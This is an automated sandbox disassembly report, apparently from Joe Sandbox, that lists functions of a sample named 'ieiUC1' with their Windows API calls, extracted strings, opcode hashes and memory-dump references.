                                                                          • API String ID: 3197017603-3944098904
                                                                          • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                          • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                                                          • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                          • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                                                          Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$FreeProcess
                                                                          • String ID:
                                                                          • API String ID: 3859560861-0
                                                                          • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                                          • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                                                          • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                                          • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                                                          Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$FreeProcess
                                                                          • String ID:
                                                                          • API String ID: 3859560861-0
                                                                          • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                                          • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                                                          • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                                          • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                                                          Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                                                          • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                                                          • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 319667368-0
                                                                          • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                                          • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                                                          • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                                          • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                                                          Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                                                          • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                                                            • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                                                          • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                                                          • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                                          • String ID:
                                                                          • API String ID: 1390108997-0
                                                                          • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                                          • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                                                          • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                                          • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                                                          Function 00007FFAADBE95BC Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,00007FFAADBE8BC9,?,?,?,?,00007FFAADBE8C14), ref: 00007FFAADBE95CB
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FFAADBE8BC9,?,?,?,?,00007FFAADBE8C14), ref: 00007FFAADBE9601
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FFAADBE8BC9,?,?,?,?,00007FFAADBE8C14), ref: 00007FFAADBE962E
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FFAADBE8BC9,?,?,?,?,00007FFAADBE8C14), ref: 00007FFAADBE963F
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FFAADBE8BC9,?,?,?,?,00007FFAADBE8C14), ref: 00007FFAADBE9650
                                                                          • SetLastError.KERNEL32(?,?,?,00007FFAADBE8BC9,?,?,?,?,00007FFAADBE8C14), ref: 00007FFAADBE966B
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                                          • Instruction ID: e96d2b6d8923d5680a7d5409b8b3db3130510ec6ed4c037d585e0c36a5ec1784
                                                                          • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                                          • Instruction Fuzzy Hash: D6113B20A0E642C9FE54A322D55513D61A2DF8ABB4F44C735D8BE476D6FF2CE44D8280
                                                                          Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                                                          • String ID:
                                                                          • API String ID: 3326452711-0
                                                                          • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                                          • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                                                          • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                                          • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                                                          Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                          • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                                                          • API String ID: 2984211723-1229430080
                                                                          • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                                          • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                                                          • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                                          • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                                                          Function 00007FFAADBE7F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                                          • Instruction ID: f630ad6b3e0716a74b392144749cbbbdb513ff101f350b8351f8f3a27d86daf7
                                                                          • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                                          • Instruction Fuzzy Hash: 4FF04F61A1A742C1FA148B34E445339A320FF8A761F548239CABDC62E4EF2CD04DC7C0
                                                                          Function 00000001400011F0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 24windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Message
                                                                          • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                                                          • API String ID: 2030045667-3610746849
                                                                          • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                                          • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                                                          • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                                          • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                                                          Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                                                          • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                                                          • ExitProcess.KERNEL32 ref: 0000000140008545
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: AddressExitHandleModuleProcProcess
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 75539706-1276376045
                                                                          • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                                          • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                                                          • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                                          • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                                                          Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: FileInfoSleepStartupType
                                                                          • String ID:
                                                                          • API String ID: 1527402494-0
                                                                          • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                                          • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                                                          • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                                          • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                                                          Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CommandLine$ByteCharErrorLastMultiWide
                                                                          • String ID:
                                                                          • API String ID: 3078728599-0
                                                                          • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                                          • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                                                          • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                                          • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                                                          Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                                          • String ID:
                                                                          • API String ID: 1850339568-0
                                                                          • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                                          • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                                                          • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                                          • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                                                          Function 00007FFAADBE9684 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FFAADBE766F,?,?,00000000,00007FFAADBE790A,?,?,?,?,?,00007FFAADBE7896), ref: 00007FFAADBE96A3
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FFAADBE766F,?,?,00000000,00007FFAADBE790A,?,?,?,?,?,00007FFAADBE7896), ref: 00007FFAADBE96C2
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FFAADBE766F,?,?,00000000,00007FFAADBE790A,?,?,?,?,?,00007FFAADBE7896), ref: 00007FFAADBE96EA
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FFAADBE766F,?,?,00000000,00007FFAADBE790A,?,?,?,?,?,00007FFAADBE7896), ref: 00007FFAADBE96FB
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FFAADBE766F,?,?,00000000,00007FFAADBE790A,?,?,?,?,?,00007FFAADBE7896), ref: 00007FFAADBE970C
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID:
                                                                          • API String ID: 3702945584-0
                                                                          • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                                          • Instruction ID: 7c0a49a4e5cca98231b6e9a80542e37cd467dc57326652fe90c51a51f5beea6a
                                                                          • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                                          • Instruction Fuzzy Hash: E9119760E0E242C9FE58AB26E55117961A2DF867F0F44D335E8BD476C6FF2CE44D8280
                                                                          Function 00007FFAADBE9518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID:
                                                                          • API String ID: 3702945584-0
                                                                          • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                                          • Instruction ID: fc6c5764aa64adaa41ce0368f54bffa29f1f5b155d51d9fae10ea67c25eba9a5
                                                                          • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                                          • Instruction Fuzzy Hash: 8B11E054E0B306CAFE68A722D46617911A1CF86764F189738D8BE4B2D2FF2CF54D86C1
                                                                          Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleLoadModuleProc
                                                                          • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                          • API String ID: 3055805555-3733552308
                                                                          • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                                          • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                                                          • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                                          • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                                                          Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
